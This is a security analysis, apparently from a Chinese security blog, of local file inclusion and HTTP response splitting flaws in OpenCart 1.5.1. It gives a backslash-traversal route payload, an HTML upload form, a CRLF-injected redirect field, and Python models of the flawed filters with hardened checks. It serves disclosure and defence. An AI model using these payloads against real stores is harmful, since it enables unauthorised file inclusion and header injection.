OpenCart multiple vulnerability analysis

OpenCart local file inclusion vulnerability analysis
Author: 单恋一支花, from dis9 team
Reference: http://www.exploit-db.com/exploits/17108/
Tested version: opencart_v1.5.1
Test system: Windows XP SP3
Result: (screenshot omitted)

Analysis:

1. Local file inclusion

index.php, line 225:

```php
// Router
if (isset($request->get['route'])) {
    $action = new Action($request->get['route']);
} else {
    $action = new Action('common/home');
}
```

Clearly the route parameter goes straight into the Action object that index.php instantiates. Now look at action.php:

```php
public function __construct($route, $args = array()) {
    $path = '';

    $parts = explode('/', str_replace('../', '', (string)$route)); // first filter

    foreach ($parts as $part) {
        $path .= $part;

        if (is_dir(DIR_APPLICATION . 'controller/' . $path)) {
            $path .= '/';
            array_shift($parts);
            continue;
        }

        if (is_file(DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php')) {
            $this->file = DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php'; // second filter
            $this->class = 'Controller' . preg_replace('/[^a-zA-Z0-9]/', '', $path);
            array_shift($parts);
            break;
        }
    }

    if ($args) {
        $this->args = $args;
    }

    $method = array_shift($parts);

    if ($method) {
        $this->method = $method;
    } else {
        $this->method = 'index';
    }
}
```

The submitted route string is filtered twice, and each time the filter only replaces "../" with an empty string. On Windows, however, both "/" and "\" act as directory separators, so "\" bypasses the filter completely: a "..\" sequence is never touched by str_replace(), and because explode('/') does not split on backslashes the whole payload reaches is_file() as a single path component. On Linux one could try stacked "./" sequences or %00 truncation; interested readers can experiment with that themselves.

Test method: create a file 1.php in the admin directory and request index.php?route=..\..\admin\1. The same trick can be used to include an uploaded file.
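To make the separator problem concrete on any host, the following added example (written for this page, not OpenCart code) models the Action constructor above in Python: it applies the two str_replace('../', '') passes and the explode('/') walk, then emulates is_dir()/is_file() by normalising the candidate path with Windows rules (ntpath) or POSIX rules (posixpath) and looking it up in a constructed directory tree. The install roots, the tree and the hardened safe_controller() whitelist are assumptions of the example; the Windows root is taken from the warning message quoted later in the post.

```python
"""Model of the route filter in OpenCart 1.5.1's action.php (added example).

Reproduces the two str_replace('../', '') passes and the explode('/') walk,
then resolves the result with Windows (ntpath) and POSIX (posixpath)
semantics so the effect of a backslash payload can be checked anywhere.
The roots and the directory tree are constructed to mirror upload/ with
DIR_APPLICATION = catalog/.
"""
import ntpath
import posixpath
import re

# Constructed install roots (Windows one matches the path in the warning
# message on this page; the POSIX one is an assumption).
WIN_ROOT = r"D:\wamp\www\opencart_v1.5.1\upload"
POSIX_ROOT = "/var/www/opencart_v1.5.1/upload"

# Constructed subset of the install tree: two real controllers plus the
# admin/1.php file the test method drops in.
DIR_PATHS = [("catalog", "controller", "product"), ("catalog", "controller", "common")]
FILE_PATHS = [
    ("catalog", "controller", "product", "product.php"),
    ("catalog", "controller", "common", "home.php"),
    ("admin", "1.php"),
]


def fake_fs(root, pathmod):
    """(dirs, files) as sets of normalised absolute paths for one OS flavour."""
    dirs = {pathmod.normpath(pathmod.join(root, *p)) for p in DIR_PATHS}
    files = {pathmod.normpath(pathmod.join(root, *p)) for p in FILE_PATHS}
    return dirs, files


def resolve_controller(route, root, pathmod):
    """Mimic Action::__construct(): return (controller file or None, method).

    is_dir()/is_file() are emulated by normalising the candidate path with
    the given OS rules and looking it up in the constructed tree.
    """
    dirs, files = fake_fs(root, pathmod)
    controller_dir = pathmod.join(root, "catalog", "controller")
    parts = route.replace("../", "").split("/")   # first filter, then explode('/')
    remaining = list(parts)                         # PHP's array_shift() works on this copy
    path = ""
    found = None
    for part in parts:                              # foreach iterates the original array
        path += part
        if pathmod.normpath(pathmod.join(controller_dir, path)) in dirs:
            path += "/"
            remaining.pop(0)
            continue
        # second filter: '../' stripped again right before the is_file() check
        candidate = pathmod.normpath(
            pathmod.join(controller_dir, path.replace("../", "") + ".php"))
        if candidate in files:
            found = candidate
            remaining.pop(0)
            break
    method = remaining.pop(0) if remaining else ""
    return found, method or "index"


# Hardened variant (an assumption of this example, not an OpenCart patch):
# whitelist the route syntax instead of stripping '../', then confirm the
# resolved file still lies inside the controller directory.
ROUTE_RE = re.compile(r"[a-z0-9_]+(?:/[a-z0-9_]+){0,2}")


def safe_controller(route, root, pathmod):
    if not ROUTE_RE.fullmatch(route):
        return None, None
    found, method = resolve_controller(route, root, pathmod)
    if found is None:
        return None, None
    controller_dir = pathmod.normpath(pathmod.join(root, "catalog", "controller"))
    if not found.startswith(controller_dir + pathmod.sep):
        return None, None
    return found, method


if __name__ == "__main__":
    for label, root, mod in (("windows", WIN_ROOT, ntpath), ("posix", POSIX_ROOT, posixpath)):
        for route in ("product/product/upload", r"..\..\admin\1", "../../admin/1"):
            print(label, repr(route), "->", resolve_controller(route, root, mod))
```

Running it shows the legitimate route resolving to product/product.php with method "upload" under both rule sets, the forward-slash traversal being neutralised by the filter everywhere, and the backslash payload resolving to upload\admin\1.php only under Windows rules. safe_controller() rejects the payload before any path is built, which is the check the original constructor lacks.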
PoC 1:

```html
<html><body><center>
<form action="http://127.0.0.1/opencart_v1.5.1/upload/index.php?route=product/product/upload" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="test">
</form>
</center></body></html>
```

Result: (screenshot omitted)

The uploaded file, however, is renamed with a random MD5 suffix, so it cannot be used directly; if anyone knows a way to exploit this, please share. upload\catalog\controller\product\product.php, line 551, names the file as follows:

```php
$file = basename($this->request->files['file']['name']) . '.' . md5(rand());
```

On Windows the file can still be located by brute force (a crude method); on Linux there are too many possibilities.

2. HTTP response splitting

Look at the code. \system\library\url.php (excerpt):

```php
public function link($route, $args = '', $connection = 'NONSSL') {
    if ($connection == 'NONSSL') {
        $url = $this->url;
    } else {
        $url = $this->ssl;
    }

    $url .= 'index.php?route=' . $route;
```

and \system\engine\controller.php (the file named in the warning below):

```php
public function redirect($url) {
    header('Location: ' . $url);
    exit;
}
```

The URL is passed into the redirect without any filtering, which would allow HTTP response splitting.

PoC 2:

```html
<html><body><center>
<form action="http://localhost/opencart_v1.5.1/upload/" method="post">
<input type="hidden" name="language_code" value="en">
<input type="hidden" name="redirect" value="?route=common/home&#013;&#010;foo=bar&#013;&#010;">
<input type="submit" value="test">
</form>
</center></body></html>
```

Test result:

Warning: Header may not contain more than a single header, new line detected. in D:\wamp\www\opencart_v1.5.1\upload\system\engine\controller.php on line 29

Note that this warning is PHP's own header-injection guard (present since PHP 5.1.2): header() refuses a value containing a newline, so on this stack the injected line never reaches the client and the response is not actually split. The redirect target is still taken from the request without any check.
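The following added example (written for this page, not OpenCart code) shows what the redirect() above would emit if the Location value were concatenated into the response unchecked, the guard PHP applies instead, and a hardened redirect check. The payload is constructed from PoC 2's hidden "redirect" field (the entities &#013;&#010; decode to CR LF in the POST body); the allowed host passed to safe_redirect_target() is an assumption.

```python
"""HTTP response splitting via an unchecked Location header (added example).

naive_redirect_response() builds the 302 a server with no header-injection
guard would send; parse_response() reads it back the way a client does;
php_header() reproduces the check PHP's header() performs; and
safe_redirect_target() is a hardened replacement for passing the request
value straight to header().
"""
import re
from urllib.parse import urlsplit

CRLF = "\r\n"
# Constructed from PoC 2's hidden "redirect" field.
POC2_REDIRECT = "?route=common/home\r\nfoo=bar\r\n"


def naive_redirect_response(url):
    """Raw 302 built the way a server with no header-injection guard would."""
    head = ["HTTP/1.1 302 Found", "Location: " + url, "Content-Length: 0"]
    return (CRLF.join(head) + CRLF + CRLF).encode("latin-1")


def parse_response(raw):
    """Return ({header-name: value}, body): the header block ends at the
    first empty line, exactly as a browser or proxy would read it."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split(CRLF)[1:]   # drop the status line
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def php_header(name, value):
    """Mimic the check PHP's header() has performed since 5.1.2: a value
    containing CR or LF is refused with the warning quoted on this page."""
    if "\r" in value or "\n" in value:
        raise ValueError(
            "Header may not contain more than a single header, new line detected")
    return f"{name}: {value}"


def safe_redirect_target(url, allowed_host):
    """Hardened redirect (an assumption of this example, not an OpenCart
    patch): reject control characters and allow only relative targets or
    absolute http(s) URLs on our own host."""
    if re.search(r"[\r\n\x00]", url):
        raise ValueError("control character in redirect target")
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        if parts.scheme not in ("http", "https") or parts.netloc != allowed_host:
            raise ValueError("off-site redirect refused: " + url)
    return url


if __name__ == "__main__":
    headers, body = parse_response(naive_redirect_response(POC2_REDIRECT))
    print("headers seen by the client:", headers)
    print("leaked past the header block:", body)
    try:
        php_header("Location", POC2_REDIRECT)
    except ValueError as exc:
        print("PHP would refuse:", exc)
    print("hardened:", safe_redirect_target("?route=common/home", "localhost"))
```

With the unchecked server the injected blank line terminates the header block early: the client sees a bogus "foo=bar" header and the real Content-Length line lands in the body, which is the splitting primitive an attacker would build on. php_header() shows why the test on this page stopped at a warning instead, and safe_redirect_target() refuses both the CRLF payload and protocol-relative or off-host targets that the original redirect() would follow.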

Unless otherwise noted, all text on this site is original. Author: matrix